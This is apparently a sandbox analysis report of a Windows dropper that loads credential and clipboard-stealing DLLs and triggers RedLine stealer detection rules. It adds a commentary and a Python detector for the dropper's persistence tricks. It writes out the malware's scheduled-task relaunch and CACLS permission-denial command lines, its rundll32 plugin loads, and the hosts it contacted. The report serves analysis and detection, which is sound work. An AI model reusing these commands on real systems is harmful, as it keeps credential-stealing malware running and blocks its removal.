file C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
file C:\Users\test22\AppData\Local\Temp\1000003051\truno.exe
file C:\Users\test22\AppData\Local\Temp\1000004001\lebro.exe
file C:\Users\test22\AppData\Roaming\1000239000\agent.exe
file C:\Users\test22\AppData\Local\Temp\1000245001\Underglaze.exe
file C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
file C:\Users\test22\AppData\Local\Temp\1000003051\truno.exe
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file C:\Users\test22\AppData\Local\Temp\1000004001\lebro.exe
file C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll
file C:\Users\test22\AppData\Roaming\1000239000\agent.exe
file C:\Users\test22\AppData\Local\Temp\1000245001\Underglaze.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "mnolyk.exe" /P "test22:N"&&CACLS "mnolyk.exe" /P "test22:R" /E&&echo Y|CACLS "..\4f9dd6f8a7" /P "test22:N"&&CACLS "..\4f9dd6f8a7" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000003051\truno.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000003051\truno.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000004001\lebro.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000004001\lebro.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\9e0894bcc4\nbveek.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\9e0894bcc4\nbveek.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "nbveek.exe" /P "test22:N"&&CACLS "nbveek.exe" /P "test22:R" /E&&echo Y|CACLS "..\9e0894bcc4" /P "test22:N"&&CACLS "..\9e0894bcc4" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Roaming\1000239000\agent.exe
parameters:
filepath: C:\Users\test22\AppData\Roaming\1000239000\agent.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000245001\Underglaze.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000245001\Underglaze.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
filepath: rundll32.exe
1 1 0
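The command lines and ShellExecuteExW records above are the dropper's persistence and self-protection in full: a scheduled task that re-launches the copy under %TEMP% every minute, a cmd.exe chain that uses `echo Y|CACLS ... /P "test22:N"` to strip the user's own permissions from the file and its directory (so neither can be deleted until the ACL is reset), and rundll32.exe loading the downloaded plugins from %APPDATA% through an exported Main. The Python below is an added example, not part of the report, that detects these three patterns in a process command line; the small helper rebuilds a command line from a ShellExecuteExW record's filepath and parameters fields as the sandbox shows them. The rules and thresholds are mine (a period of five minutes or less, and a target under a user-writable AppData path), and the benign samples are constructed.

```python
import re

# Paths a standard user can write without elevation (the dropper's homes above).
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\(Local\\Temp|Roaming)\\", re.I)

SCHTASKS_CREATE = re.compile(r'schtasks(?:\.exe)?"?\s+/Create\b', re.I)
SC_MINUTE = re.compile(r"/SC\s+MINUTE\b", re.I)
MODIFIER = re.compile(r"/MO\s+(\d+)", re.I)
TASK_RUN = re.compile(r'/TR\s+"([^"]+)"', re.I)
# CACLS <file> /P <user>:N replaces the ACL with "no access" for that user.
CACLS_DENY = re.compile(r'CACLS\s+"([^"]+)"\s+/P\s+"([^":]+):N"', re.I)
RUNDLL32_LOAD = re.compile(r'rundll32(?:\.exe)?"?\s+"?([^",]+?\.dll)"?\s*,\s*(\w+)', re.I)

MAX_PERIOD_MINUTES = 5   # assumption: a relaunch this frequent is a watchdog, not a job


def from_shellexecute(filepath, parameters):
    """Rebuild a command line from a ShellExecuteExW record's two fields."""
    return f"{filepath} {parameters}".strip()


def analyze_cmdline(cmd):
    """Return a list of findings ({'rule': ..., details}) for one command line."""
    findings = []
    if SCHTASKS_CREATE.search(cmd) and SC_MINUTE.search(cmd):
        mo = MODIFIER.search(cmd)
        every = int(mo.group(1)) if mo else 1          # /MO defaults to 1
        tr = TASK_RUN.search(cmd)
        target = tr.group(1) if tr else ""
        if every <= MAX_PERIOD_MINUTES and USER_WRITABLE.search(target):
            findings.append({"rule": "schtasks_minute_persistence",
                             "target": target, "every_minutes": every})
    denies = CACLS_DENY.findall(cmd)
    if denies:
        findings.append({"rule": "cacls_self_deny",
                         "targets": [t for t, _ in denies],
                         "user": denies[0][1]})
    m = RUNDLL32_LOAD.search(cmd)
    if m and USER_WRITABLE.search(m.group(1)):
        findings.append({"rule": "rundll32_appdata_dll",
                         "dll": m.group(1), "export": m.group(2)})
    return findings


def rule_names(cmd):
    return {f["rule"] for f in analyze_cmdline(cmd)}


# Command lines copied from the report.
TASK = r'"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F'
ACL = r'"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "test22:N"&&CACLS "nbveek.exe" /P "test22:R" /E&&echo Y|CACLS "..\9e0894bcc4" /P "test22:N"&&CACLS "..\9e0894bcc4" /P "test22:R" /E&&Exit'
PLUGIN = from_shellexecute("rundll32.exe", r"C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main")
# Constructed benign controls: a daily job, and a minute task from Program Files.
BENIGN_DAILY = r'schtasks /Create /SC DAILY /TN Backup /TR "C:\Program Files\Backup\backup.exe"'
BENIGN_SLOW = r'"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 30 /TN Sync /TR "C:\Program Files\Sync\sync.exe"'

if __name__ == "__main__":
    for cmd in (TASK, ACL, PLUGIN, BENIGN_DAILY, BENIGN_SLOW):
        print(analyze_cmdline(cmd))
```

The CACLS rule keys on the `:N` grant only; the `/P "test22:R" /E` that follows in the chain re-adds read access so the scheduled task can still launch the binary, which is why the finding reports targets rather than the whole chain.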
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 3044
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 110592
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x00402000
process_handle: 0x0000002c
1 0 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZ... [PE image; the raw bytes were rendered as text and are not reproduced. Readable strings in the buffer: "This program cannot be run in DOS mode", "Rich", sections .text/.data/.idata/.rsrc/.reloc, "advapi32.dll", "CheckTokenMembership", "SeShutdownPrivilege", "advpack.dll", "DelNodeRunDLL32", "wininit.ini", "IXP%03d.TMP", "msdownld.tmp", the directive names TITLE/EXTRACTOPT/RUNPROGRAM/POSTRUNPROGRAM/FINISHMSG, and the PDB path "wextract.pdb". The downloaded file is therefore another Windows self-extracting CAB stub (wextract, the same PDB path as the submitted sample), which is what creates the IXP00n.TMP extraction directories in the dropped-file list.]
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZ... [PE image; raw bytes rendered as text, not reproduced. Readable strings: "This program cannot be run in DOS mode", "Rich", sections .text/.rdata/.data/.rsrc/.reloc; the remainder is native code with no further meaningful strings.]
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer:
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer:
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer:
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer:
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer:
request_handle: 0x00cc000c
1 1 0
section .rsrc (virtual_address 0x0000c000, virtual_size 0x000eb000, size_of_data 0x000eae00, entropy 7.94412795068915) entropy 7.94412795069 description A section with a high entropy has been found
entropy 0.966563786008 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Communications smtp rule Network_SMTP_dotNet
description PWS Memory rule Generic_PWS_Memory_Zero
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description RedLine stealer rule RedLine_Stealer_m_Zero
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description RedLine stealer rule RedLine_Stealer_m_Zero
Time & API Arguments Status Return Repeated

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x00000394
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

regkey_r: 7-Zip
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
1 0 0

RegOpenKeyExW

regkey_r: AddressBook
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

regkey_r: Adobe AIR
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR
1 0 0

RegOpenKeyExW

regkey_r: Connection Manager
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

regkey_r: DirectDrawEx
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

regkey_r: EditPlus
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

regkey_r: Fontcore
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

regkey_r: Google Chrome
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

regkey_r: Haansoft HWord 80 Korean
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

regkey_r: IE40
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

regkey_r: IE4Data
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExW

regkey_r: IE5BAKEX
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExW

regkey_r: IEData
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExW

regkey_r: MobileOptionPack
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExW

regkey_r: Mozilla Thunderbird 78.4.0 (x86 ko)
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)
1 0 0

RegOpenKeyExW

regkey_r: Office15.PROPLUSR
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR
1 0 0

RegOpenKeyExW

regkey_r: SchedulingAgent
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExW

regkey_r: WIC
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExW

regkey_r: {00203668-8170-44A0-BE44-B632FA4D780F}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}
1 0 0

RegOpenKeyExW

regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExW

regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExW

regkey_r: {26A24AE4-039D-4CA4-87B4-2F32180131F0}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}
1 0 0

RegOpenKeyExW

regkey_r: {4A03706F-666A-4037-7777-5F2748764D10}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}
1 0 0

RegOpenKeyExW

regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-0015-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-0016-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-0018-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-0019-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-001A-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-001B-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-001F-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-001F-040C-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-001F-0C0A-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-002C-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-0044-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-006E-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-0090-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-00A1-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-00BA-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-00E1-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-00E2-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-0115-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-0117-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-012B-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {91150000-0011-0000-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
1 0 0

RegOpenKeyExW

regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
1 0 0

RegOpenKeyExW

regkey_r: {AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: {BB8B979E-E336-47E7-96BC-1031C1B94561}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}
1 0 0
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F
wmi SELECT * FROM Win32_Processor
buffer Buffer with sha1: d654256406a4d27611366b4439d53bc02bb04f6c
host 176.113.115.17
host 193.233.20.15
host 193.233.20.16
host 193.233.20.17
host 45.32.218.145
host 62.204.41.245
host 62.204.41.88
host 79.110.62.167
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 3044
region_size: 204800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000002c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2976
region_size: 204800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000284
1 0 0
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
Time & API Arguments Status Return Repeated

ControlService

service_handle: 0x0000000001217980
service_name: None
control_code: 1
0 0

ControlService

service_handle: 0x0000000001217c20
service_name: None
control_code: 1
0 0
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
